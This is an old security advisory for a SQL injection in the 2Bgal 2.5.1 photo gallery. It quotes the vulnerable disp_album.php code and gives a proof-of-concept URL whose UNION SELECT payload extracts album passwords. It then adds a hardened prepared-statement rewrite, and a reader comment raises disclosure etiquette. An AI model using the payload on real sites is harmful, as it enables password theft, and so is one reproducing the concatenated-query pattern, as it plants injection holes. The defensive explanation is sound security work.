Welcome to Coding : Sécurité Programmation Réseaux
2Bgal 2.5.1 SQL injection Vulnerability
Posted on Wednesday, December 22 @ 01:58:47 CET
Topic: Divers

2Bgal 2.5.1 SQL injection Vulnerability (http://www.ben3w.com/) 22/12/2004
----------------------------------------------------------------------
Description:
----------------------------------------------------------------------
2Bgal is a fully customizable photo gallery. It seems to be vulnerable to SQL injection.
----------------------------------------------------------------------
Vulnerable code (disp_album.php, around line 53, and maybe disp_img.php):
----------------------------------------------------------------------
    // $id_album is taken straight from the request and concatenated into the SQL text
    $chaine = "SELECT nom,idpere FROM ".$tbl_alist." WHERE id=".$id_album;
    $request = MYSQL_QUERY($chaine);
    $nom_currentalbum = mysql_result($request,0,"nom");
    $idpere_currentalbum = mysql_result($request,0,"idpere");
----------------------------------------------------------------------
Proof of concept (2Bgal with MySQL 4.x.x):
----------------------------------------------------------------------
http://www.server.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%20passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201;
This request returns the password of the first album. Other passwords can be obtained by varying the injected SQL.
----------------------------------------------------------------------
Discovered by Romain Le Guen: http://coding.romainl.com
contact @AT@ romainl.com
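The root cause in the quoted snippet is that the id_album request parameter is concatenated into the query text, so anything after the number (here a UNION SELECT) becomes part of the statement. The following is an added example, written for this page and not code from 2Bgal or its author, showing a hardened rewrite of that lookup: the parameter is validated as an integer, the table name is a fixed allow-listed value, and the id is passed as a bound parameter of a prepared statement. The column and table names (nom, idpere, galbumlist) and the parameter name come from the advisory; the mysqli connection details are assumptions.

```php
<?php
// Added example (not 2Bgal's own code): hardened version of the
// disp_album.php lookup quoted in the advisory.

// 1. Validate the request parameter as a non-negative integer.
//    FILTER_VALIDATE_INT returns false for inputs such as "2 UNION SELECT ..."
//    and null when the parameter is absent, so both cases are rejected here.
$id_album = filter_input(INPUT_GET, 'id_album', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 0],
]);
if ($id_album === false || $id_album === null) {
    http_response_code(400);
    exit('invalid album id');
}

// 2. The table name is interpolated into the statement text, so it must be a
//    fixed value under the application's control, never derived from input.
$tbl_alist = 'galbumlist'; // table name as it appears in the advisory's PoC

// 3. Bind the id as a parameter: it is sent separately from the SQL text, so it
//    cannot change the statement's structure. (The original used the legacy
//    mysql_* functions, which were removed in PHP 7.0.)
$db = new mysqli('localhost', 'gallery_user', 'secret', 'gallery'); // assumed credentials
$db->set_charset('utf8mb4');

$stmt = $db->prepare("SELECT nom, idpere FROM `{$tbl_alist}` WHERE id = ?");
$stmt->bind_param('i', $id_album);   // 'i' = integer parameter
$stmt->execute();
$stmt->bind_result($nom_currentalbum, $idpere_currentalbum);

if (!$stmt->fetch()) {
    http_response_code(404);
    exit('album not found');
}
$stmt->close();

// $nom_currentalbum and $idpere_currentalbum now describe only the requested
// album; a UNION payload in id_album is refused at step 1 and, even if it
// reached step 3, would be treated as a literal value rather than SQL.
```

Two points worth noting for anyone auditing a similar gallery: the same pattern has to be applied to every script that builds a query from a request parameter (the advisory flags disp_img.php as a likely second instance), and the PoC shows that a single SELECT on the passwd column yields a usable password, so the injection fix should be paired with storing album passwords in hashed form.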

Re: 2Bgal 2.5.1 SQL injection Vulnerability (Score: 0)
by Anonymous on Sunday, January 02 @ 23:51:38 CET
A version fixing this flaw was put online today. It would have been good to inform the script's author before publishing the news about this flaw, or even to inform him at all... Finding a problem in open source code is good. Letting its author fix it is even better. Ben



PHP-Nuke Copyright © 2005 by Francisco Burzi. This is free software, and you may redistribute it under the GPL. PHP-Nuke comes with absolutely no warranty, for details, see the license.